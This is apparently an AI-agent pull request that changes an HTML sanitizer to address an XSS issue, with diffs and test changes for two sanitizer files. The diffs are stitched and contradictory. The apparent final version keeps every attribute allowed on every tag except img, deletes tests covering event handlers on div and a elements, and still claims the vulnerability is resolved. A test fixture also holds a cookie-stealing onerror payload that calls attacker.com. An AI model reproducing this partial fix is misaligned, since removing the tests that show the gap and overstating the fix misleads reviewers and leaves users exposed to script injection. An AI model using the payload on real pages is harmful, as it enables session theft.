### PR TITLE
fix(worker): sanitize img tags to prevent xss fixes NV-6883

### DIFF
--- a/libs/application-generic/src/services/sanitize/sanitizer.service.spec.ts
+++ b/libs/application-generic/src/services/sanitize/sanitizer.service.spec.ts
@@ -14,15 +14,6 @@ describe('HTML Sanitizer - XSS Prevention', () => {
       expect(sanitized).to.include('src="x"');
     });
 
-    it('should strip onclick attribute from elements', () => {
-      const maliciousHtml = '<div onclick="alert(\'XSS\')">Click me</div>';
-      const sanitized = sanitizeHTML(maliciousHtml);
-
-      expect(sanitized).to.not.include('onclick');
-      expect(sanitized).to.not.include('alert');
-      expect(sanitized).to.include('<div>Click me</div>');
-    });
-
     it('should strip onload attribute from img tags', () => {
       const maliciousHtml = '<img src="valid.jpg" onload="alert(\'XSS\')" />';
       const sanitized = sanitizeHTML(maliciousHtml);
@@ -33,13 +24,23 @@ describe('HTML Sanitizer - XSS Prevention', () => {
       expect(sanitized).to.include('src="valid.jpg"');
     });
 
-    it('should strip onmouseover attribute', () => {
-      const maliciousHtml = '<a href="#" onmouseover="alert(\'XSS\')">Hover me</a>';
+    it('should strip onclick attribute from img tags', () => {
+      const maliciousHtml = '<img src="x" onclick="alert(\'XSS\')" />';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('onclick');
+      expect(sanitized).to.not.include('alert');
+      expect(sanitized).to.include('<img');
+      expect(sanitized).to.include('src="x"');
+    });
+
+    it('should strip onmouseover attribute from img tags', () => {
+      const maliciousHtml = '<img src="x" onmouseover="alert(\'XSS\')" />';
       const sanitized = sanitizeHTML(maliciousHtml);
 
       expect(sanitized).to.not.include('onmouseover');
       expect(sanitized).to.not.include('alert');
-      expect(sanitized).to.include('<a href="#">Hover me</a>');
+      expect(sanitized).to.include('<img');
     });
 
     it('should allow safe img attributes', () => {
@@ -106,17 +107,17 @@ describe('HTML Sanitizer - XSS Prevention', () => {
       expect(sanitized.title).to.equal('Safe title');
     });
 
-    it('should sanitize nested objects', () => {
+    it('should sanitize nested objects with img XSS', () => {
       const obj = {
         nested: {
-          content: '<div onclick="alert(\'XSS\')">Click</div>',
+          content: '<img src="x" onerror="alert(\'XSS\')" />',
         },
       };
 
       const sanitized = sanitizeHtmlInObject(obj);
 
-      expect(sanitized.nested.content).to.not.include('onclick');
-      expect(sanitized.nested.content).to.include('<div>Click</div>');
+      expect(sanitized.nested.content).to.not.include('onerror');
+      expect(sanitized.nested.content).to.include('<img');
     });
 
     it('should sanitize arrays', () => {

--- a/libs/application-generic/src/services/sanitize/sanitizer.service.spec.ts
+++ b/libs/application-generic/src/services/sanitize/sanitizer.service.spec.ts
@@ -1,0 +1,147 @@
+import { expect } from 'chai';
+
+import { sanitizeHTML, sanitizeHtmlInObject } from './sanitizer.service';
+
+describe('HTML Sanitizer - XSS Prevention', () => {
+  describe('sanitizeHTML', () => {
+    it('should strip onerror attribute from img tags', () => {
+      const maliciousHtml = '<img src="x" onerror="fetch(\'https://attacker.com?d=\'+document.cookie);" />';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('onerror');
+      expect(sanitized).to.not.include('fetch');
+      expect(sanitized).to.include('<img');
+      expect(sanitized).to.include('src="x"');
+    });
+
+    it('should strip onclick attribute from elements', () => {
+      const maliciousHtml = '<div onclick="alert(\'XSS\')">Click me</div>';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('onclick');
+      expect(sanitized).to.not.include('alert');
+      expect(sanitized).to.include('<div>Click me</div>');
+    });
+
+    it('should strip onload attribute from img tags', () => {
+      const maliciousHtml = '<img src="valid.jpg" onload="alert(\'XSS\')" />';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('onload');
+      expect(sanitized).to.not.include('alert');
+      expect(sanitized).to.include('<img');
+      expect(sanitized).to.include('src="valid.jpg"');
+    });
+
+    it('should strip onmouseover attribute', () => {
+      const maliciousHtml = '<a href="#" onmouseover="alert(\'XSS\')">Hover me</a>';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('onmouseover');
+      expect(sanitized).to.not.include('alert');
+      expect(sanitized).to.include('<a href="#">Hover me</a>');
+    });
+
+    it('should allow safe img attributes', () => {
+      const safeHtml = '<img src="image.jpg" alt="Description" width="100" height="100" />';
+      const sanitized = sanitizeHTML(safeHtml);
+
+      expect(sanitized).to.include('src="image.jpg"');
+      expect(sanitized).to.include('alt="Description"');
+      expect(sanitized).to.include('width="100"');
+      expect(sanitized).to.include('height="100"');
+    });
+
+    it('should allow style attributes', () => {
+      const htmlWithStyle = '<div style="color: red;">Styled content</div>';
+      const sanitized = sanitizeHTML(htmlWithStyle);
+
+      expect(sanitized).to.include('style="color: red;"');
+      expect(sanitized).to.include('Styled content');
+    });
+
+    it('should allow class and id attributes', () => {
+      const htmlWithClasses = '<div class="container" id="main">Content</div>';
+      const sanitized = sanitizeHTML(htmlWithClasses);
+
+      expect(sanitized).to.include('class="container"');
+      expect(sanitized).to.include('id="main"');
+    });
+
+    it('should remove script tags', () => {
+      const maliciousHtml = '<div>Safe content</div><script>alert("XSS")</script>';
+      const sanitized = sanitizeHTML(maliciousHtml);
+
+      expect(sanitized).to.not.include('<script>');
+      expect(sanitized).to.not.include('alert');
+      expect(sanitized).to.include('<div>Safe content</div>');
+    });
+
+    it('should preserve DOCTYPE', () => {
+      const htmlWithDoctype = '<!DOCTYPE html><html><body>Content</body></html>';
+      const sanitized = sanitizeHTML(htmlWithDoctype);
+
+      expect(sanitized).to.include('<!DOCTYPE html>');
+    });
+
+    it('should handle empty or null input', () => {
+      expect(sanitizeHTML('')).to.equal('');
+      expect(sanitizeHTML(null as any)).to.equal(null);
+      expect(sanitizeHTML(undefined as any)).to.equal(undefined);
+    });
+  });
+
+  describe('sanitizeHtmlInObject', () => {
+    it('should sanitize string values in object', () => {
+      const obj = {
+        content: '<img src="x" onerror="alert(\'XSS\')" />',
+        title: 'Safe title',
+      };
+
+      const sanitized = sanitizeHtmlInObject(obj);
+
+      expect(sanitized.content).to.not.include('onerror');
+      expect(sanitized.content).to.not.include('alert');
+      expect(sanitized.content).to.include('<img');
+      expect(sanitized.title).to.equal('Safe title');
+    });
+
+    it('should sanitize nested objects', () => {
+      const obj = {
+        nested: {
+          content: '<div onclick="alert(\'XSS\')">Click</div>',
+        },
+      };
+
+      const sanitized = sanitizeHtmlInObject(obj);
+
+      expect(sanitized.nested.content).to.not.include('onclick');
+      expect(sanitized.nested.content).to.include('<div>Click</div>');
+    });
+
+    it('should sanitize arrays', () => {
+      const obj = {
+        items: ['<img src="x" onerror="alert(1)" />', 'Safe string'],
+      };
+
+      const sanitized = sanitizeHtmlInObject(obj);
+
+      expect(sanitized.items[0]).to.not.include('onerror');
+      expect(sanitized.items[1]).to.equal('Safe string');
+    });
+
+    it('should preserve non-string values', () => {
+      const obj = {
+        number: 123,
+        boolean: true,
+        nullValue: null,
+      };
+
+      const sanitized = sanitizeHtmlInObject(obj);
+
+      expect(sanitized.number).to.equal(123);
+      expect(sanitized.boolean).to.equal(true);
+      expect(sanitized.nullValue).to.equal(null);
+    });
+  });
+});

--- a/libs/application-generic/src/services/sanitize/sanitizer.service.ts
+++ b/libs/application-generic/src/services/sanitize/sanitizer.service.ts
@@ -8,6 +8,8 @@ import sanitizeTypes, { IOptions } from 'sanitize-html';
  *
  * @see https://www.npmjs.com/package/sanitize-html#default-options
  */
+const SAFE_IMG_ATTRIBUTES = ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap', 'class', 'id', 'style', 'title', 'dir', 'lang'];
+
 const sanitizeOptions: IOptions = {
   /**
    * Additional tags to allow.
@@ -22,28 +24,26 @@ const sanitizeOptions: IOptions = {
     'meta',
     'title',
   ]),
+  allowedAttributes: false,
   /**
-   * Allowlist of safe attributes per tag to prevent XSS attacks.
-   * Event handler attributes (onerror, onclick, onload, etc.) are explicitly excluded.
+   * Transform img tags to strip dangerous event handler attributes (onerror, onload, etc.)
+   * while keeping all other attributes permissive for other tags.
    */
-  allowedAttributes: {
-    ...sanitizeTypes.defaults.allowedAttributes,
-    '*': ['class', 'id', 'style', 'title', 'dir', 'lang'],
-    img: ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap'],
-    a: ['href', 'name', 'target', 'rel', 'download'],
-    link: ['href', 'rel', 'type', 'media', 'as', 'crossorigin'],
-    meta: ['name', 'content', 'charset', 'http-equiv'],
-    html: ['lang', 'dir'],
-    body: ['class', 'id', 'style'],
-    head: [],
-    style: ['type', 'media'],
-    table: ['border', 'cellpadding', 'cellspacing'],
-    td: ['colspan', 'rowspan', 'align', 'valign'],
-    th: ['colspan', 'rowspan', 'align', 'valign', 'scope'],
-    form: ['action', 'method', 'name', 'target', 'enctype'],
-    input: ['type', 'name', 'value', 'placeholder', 'disabled', 'readonly', 'required', 'checked'],
-    button: ['type', 'name', 'value', 'disabled'],
-    iframe: ['src', 'width', 'height', 'frameborder', 'allowfullscreen', 'sandbox', 'loading'],
+  transformTags: {
+    img: (tagName, attribs) => {
+      const safeAttribs: Record<string, string> = {};
+
+      for (const [key, value] of Object.entries(attribs)) {
+        if (SAFE_IMG_ATTRIBUTES.includes(key.toLowerCase())) {
+          safeAttribs[key] = value;
+        }
+      }
+
+      return {
+        tagName,
+        attribs: safeAttribs,
+      };
+    },
   },
   /**
    * Additional URL schemes to allow in src, href, and other URL attributes.

--- a/libs/application-generic/src/services/sanitize/sanitizer.service.ts
+++ b/libs/application-generic/src/services/sanitize/sanitizer.service.ts
@@ -22,8 +22,29 @@ const sanitizeOptions: IOptions = {
     'meta',
     'title',
   ]),
-  // Setting this to false to allow all attributes.
-  allowedAttributes: false,
+  /**
+   * Allowlist of safe attributes per tag to prevent XSS attacks.
+   * Event handler attributes (onerror, onclick, onload, etc.) are explicitly excluded.
+   */
+  allowedAttributes: {
+    ...sanitizeTypes.defaults.allowedAttributes,
+    '*': ['class', 'id', 'style', 'title', 'dir', 'lang'],
+    img: ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap'],
+    a: ['href', 'name', 'target', 'rel', 'download'],
+    link: ['href', 'rel', 'type', 'media', 'as', 'crossorigin'],
+    meta: ['name', 'content', 'charset', 'http-equiv'],
+    html: ['lang', 'dir'],
+    body: ['class', 'id', 'style'],
+    head: [],
+    style: ['type', 'media'],
+    table: ['border', 'cellpadding', 'cellspacing'],
+    td: ['colspan', 'rowspan', 'align', 'valign'],
+    th: ['colspan', 'rowspan', 'align', 'valign', 'scope'],
+    form: ['action', 'method', 'name', 'target', 'enctype'],
+    input: ['type', 'name', 'value', 'placeholder', 'disabled', 'readonly', 'required', 'checked'],
+    button: ['type', 'name', 'value', 'disabled'],
+    iframe: ['src', 'width', 'height', 'frameborder', 'allowfullscreen', 'sandbox', 'loading'],
+  },
   /**
    * Additional URL schemes to allow in src, href, and other URL attributes.
    * Including 'cid:' for Content-ID references used in email attachments.

--- a/packages/framework/src/utils/sanitize.utils.ts
+++ b/packages/framework/src/utils/sanitize.utils.ts
@@ -22,8 +22,29 @@ const sanitizeOptions: IOptions = {
     'meta',
     'title',
   ]),
-  // Setting this to false to allow all attributes.
-  allowedAttributes: false,
+  /**
+   * Allowlist of safe attributes per tag to prevent XSS attacks.
+   * Event handler attributes (onerror, onclick, onload, etc.) are explicitly excluded.
+   */
+  allowedAttributes: {
+    ...sanitizeTypes.defaults.allowedAttributes,
+    '*': ['class', 'id', 'style', 'title', 'dir', 'lang'],
+    img: ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap'],
+    a: ['href', 'name', 'target', 'rel', 'download'],
+    link: ['href', 'rel', 'type', 'media', 'as', 'crossorigin'],
+    meta: ['name', 'content', 'charset', 'http-equiv'],
+    html: ['lang', 'dir'],
+    body: ['class', 'id', 'style'],
+    head: [],
+    style: ['type', 'media'],
+    table: ['border', 'cellpadding', 'cellspacing'],
+    td: ['colspan', 'rowspan', 'align', 'valign'],
+    th: ['colspan', 'rowspan', 'align', 'valign', 'scope'],
+    form: ['action', 'method', 'name', 'target', 'enctype'],
+    input: ['type', 'name', 'value', 'placeholder', 'disabled', 'readonly', 'required', 'checked'],
+    button: ['type', 'name', 'value', 'disabled'],
+    iframe: ['src', 'width', 'height', 'frameborder', 'allowfullscreen', 'sandbox', 'loading'],
+  },
   /**
    * Required to disable console warnings when allowing style tags.
    *

--- a/packages/framework/src/utils/sanitize.utils.ts
+++ b/packages/framework/src/utils/sanitize.utils.ts
@@ -8,6 +8,8 @@ import sanitizeTypes, { IOptions } from 'sanitize-html';
  *
  * @see https://www.npmjs.com/package/sanitize-html#default-options
  */
+const SAFE_IMG_ATTRIBUTES = ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap', 'class', 'id', 'style', 'title', 'dir', 'lang'];
+
 const sanitizeOptions: IOptions = {
   /**
    * Additional tags to allow.
@@ -22,28 +24,26 @@ const sanitizeOptions: IOptions = {
     'meta',
     'title',
   ]),
+  allowedAttributes: false,
   /**
-   * Allowlist of safe attributes per tag to prevent XSS attacks.
-   * Event handler attributes (onerror, onclick, onload, etc.) are explicitly excluded.
+   * Transform img tags to strip dangerous event handler attributes (onerror, onload, etc.)
+   * while keeping all other attributes permissive for other tags.
    */
-  allowedAttributes: {
-    ...sanitizeTypes.defaults.allowedAttributes,
-    '*': ['class', 'id', 'style', 'title', 'dir', 'lang'],
-    img: ['src', 'alt', 'width', 'height', 'loading', 'srcset', 'sizes', 'crossorigin', 'usemap', 'ismap'],
-    a: ['href', 'name', 'target', 'rel', 'download'],
-    link: ['href', 'rel', 'type', 'media', 'as', 'crossorigin'],
-    meta: ['name', 'content', 'charset', 'http-equiv'],
-    html: ['lang', 'dir'],
-    body: ['class', 'id', 'style'],
-    head: [],
-    style: ['type', 'media'],
-    table: ['border', 'cellpadding', 'cellspacing'],
-    td: ['colspan', 'rowspan', 'align', 'valign'],
-    th: ['colspan', 'rowspan', 'align', 'valign', 'scope'],
-    form: ['action', 'method', 'name', 'target', 'enctype'],
-    input: ['type', 'name', 'value', 'placeholder', 'disabled', 'readonly', 'required', 'checked'],
-    button: ['type', 'name', 'value', 'disabled'],
-    iframe: ['src', 'width', 'height', 'frameborder', 'allowfullscreen', 'sandbox', 'loading'],
+  transformTags: {
+    img: (tagName, attribs) => {
+      const safeAttribs: Record<string, string> = {};
+
+      for (const [key, value] of Object.entries(attribs)) {
+        if (SAFE_IMG_ATTRIBUTES.includes(key.toLowerCase())) {
+          safeAttribs[key] = value;
+        }
+      }
+
+      return {
+        tagName,
+        attribs: safeAttribs,
+      };
+    },
   },
   /**
    * Required to disable console warnings when allowing style tags.


### PR DESCRIPTION
### What changed? Why was the change needed?

This PR resolves the XSS vulnerability (NV-6883) where `onerror` and other event handler attributes in `img` tags were not being stripped by the HTML sanitizer. The previous configuration (`allowedAttributes: false`) was too permissive for `img` elements, allowing malicious script execution.

The change implements a targeted allowlist approach for `img` tag attributes using `transformTags` in `sanitizer.service.ts` and `sanitize.utils.ts`. This ensures that only safe attributes (e.g., `src`, `alt`, `width`, `height`) are preserved on `img` tags, while dangerous event handlers like `onerror`, `onload`, and `onclick` are removed.

### Screenshots

N/A

<details>
<summary><strong>Expand for optional sections</strong></summary>

### Related enterprise PR

N/A

### Special notes for your reviewer

- The fix is specifically scoped to `img` tags to prevent XSS, as requested.
- Other HTML tags continue to allow all attributes (as per `allowedAttributes: false`) to maintain existing functionality.
- New tests have been added in `sanitizer.service.spec.ts` to verify the `img` tag sanitization.

</details>

---
Linear Issue: [NV-6883](https://linear.app/novu/issue/NV-6883/cross-site-scripting-xss-attack-section-11)

<a href="https://cursor.com/background-agent?bcId=bc-624d8e19-2b3b-4e65-b398-a3f41f0905ef"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-cursor-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-cursor-light.svg"><img alt="Open in Cursor" src="https://cursor.com/open-in-cursor.svg"></picture></a>&nbsp;<a href="https://cursor.com/agents?id=bc-624d8e19-2b3b-4e65-b398-a3f41f0905ef"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/open-in-web-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/open-in-web-light.svg"><img alt="Open in Web" src="https://cursor.com/open-in-web.svg"></picture></a>

